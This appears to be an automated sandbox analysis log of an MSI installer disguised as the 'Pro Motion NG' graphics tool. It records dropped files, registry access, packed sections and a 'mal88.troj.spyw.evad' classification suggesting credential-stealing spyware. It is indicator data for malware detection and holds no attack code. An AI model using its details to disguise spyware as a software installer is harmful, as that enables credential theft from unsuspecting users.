Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_108F3650	3_2_108F3650
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10803704	3_2_10803704
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10A65BC0	3_2_10A65BC0
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10808CB4	3_2_10808CB4
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10A3BC30	3_2_10A3BC30
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10A00C70	3_2_10A00C70
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10A39D78	3_2_10A39D78
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10A59EE0	3_2_10A59EE0
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_108EEF88	3_2_108EEF88
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_1099FFA0	3_2_1099FFA0
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_108F2F0C	3_2_108F2F0C
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_109CBF60	3_2_109CBF60

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: String function: 108390D4 appears 56 times
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: String function: 108053D8 appears 56 times

Source: cddbU.dll.1.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: promot_s.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs promot_s.msi
Source: promot_s.msi	Binary or memory string: OriginalFilenameShowBackgroundImages.dllF vs promot_s.msi

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Section loaded: core_rl_wand_.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Section loaded: core_rl_magickwand_.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Section loaded: wpdfview03.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Section loaded: wpdecodejp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Section loaded: libeay32.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Memory allocated: 74B40000 page read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Memory allocated: 76C60000 page read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Memory allocated: 779D0000 page read and write	Jump to behavior

Source: ImBatch.exe.1.dr

Static PE information: Section: ZLIB complexity 0.9995098090341152

Source: C:\Windows\System32\msiexec.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\promot_s.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A3469819A8715BFB02FD0117F532ABA5
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A3469819A8715BFB02FD0117F532ABA5	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF6C97059AB4FF524D.TMP

Jump to behavior

Source: classification engine

Classification label: mal88.troj.spyw.evad.winMSI@6/46@39/4

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_1080D25A GetDiskFreeSpaceW,

3_2_1080D25A

Source: ImBatch.exe, 00000003.00000002.440238833.00000000148A3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_1085105C GetLastError,FormatMessageW,

3_2_1085105C

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Mutant created: \Sessions\1\BaseNamedObjects\imbatch_update

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_1080D222 FreeResource,

3_2_1080D222

Source: C:\Windows\System32\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Window found: window name: TComboBox

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: promot_s.msi

Static file information: File size 14749696 > 1048576

Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\ShowBackgroundImages.pdb source: promot_s.msi, 3b2df6.msi.1.dr
Source:	Binary string: C:\dev\winmerge\Externals\winimerge\Build\x86\Release\WinIMerge\WinIMergeLib.pdb source: WinIMergeLib.dll.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: promot_s.msi, MSI3154.tmp.1.dr, MSI3F22.tmp.1.dr, 3b2df6.msi.1.dr

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10A7308C push 10A731C0h; ret	3_2_10A731B8
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_108051A4 push eax; ret	3_2_108051E0
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_1083B374 push ecx; mov dword ptr [esp], edx	3_2_1083B376
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_1080B508 push 1080B577h; ret	3_2_1080B56F
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_1099D8E0 push ecx; mov dword ptr [esp], edx	3_2_1099D8E5
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10808BC8 push ecx; mov dword ptr [esp], eax	3_2_10808BC9
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10A65BC0 push 10A67BAAh; ret	3_2_10A67BA2
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_108B8CA4 push ecx; mov dword ptr [esp], edx	3_2_108B8CA8
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_1099EC3C push ecx; mov dword ptr [esp], edx	3_2_1099EC41
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_1090EC48 push 1090ECEAh; ret	3_2_1090ECE2
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10841DB0 push ecx; mov dword ptr [esp], ecx	3_2_10841DB3
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_1099ED40 push ecx; mov dword ptr [esp], edx	3_2_1099ED45
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10813E68 push ecx; mov dword ptr [esp], ecx	3_2_10813E6D

Source: ApiCore.dll.1.dr	Static PE information: section name: .l2
Source: wPDFView03.dll.1.dr	Static PE information: section name: .didata
Source: ImBatch.exe.1.dr	Static PE information: section name:
Source: ImBatch.exe.1.dr	Static PE information: section name:
Source: ImBatch.exe.1.dr	Static PE information: section name:
Source: ImBatch.exe.1.dr	Static PE information: section name:
Source: ImBatch.exe.1.dr	Static PE information: section name:
Source: ImBatch.exe.1.dr	Static PE information: section name:

Source: pspiHost.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x31fa0
Source: DirectXTex.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x801c4
Source: wPDFView03.dll.1.dr	Static PE information: real checksum: 0x2f1dfc should be: 0x2f3ef0
Source: WinIMergeLib.dll.1.dr	Static PE information: real checksum: 0x4ee8b5 should be: 0x4f68b5
Source: jpeg62.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0xbee2b
Source: cddbU.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0xd91b8

Source: initial sample

Static PE information: section name: entropy: 7.996986083550067

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\jpeg62.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3174.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\cddbU.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\WinIMergeLib.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI31B3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3133.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\wPDFView03.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\pspiHost.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3086.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\wp_type1ttf.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3F22.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ApiCore.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3154.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\DirectXTex.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3174.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI31B3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3133.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3086.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3F22.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3154.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_1080DC66 IsIconic,

3_2_1080DC66

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
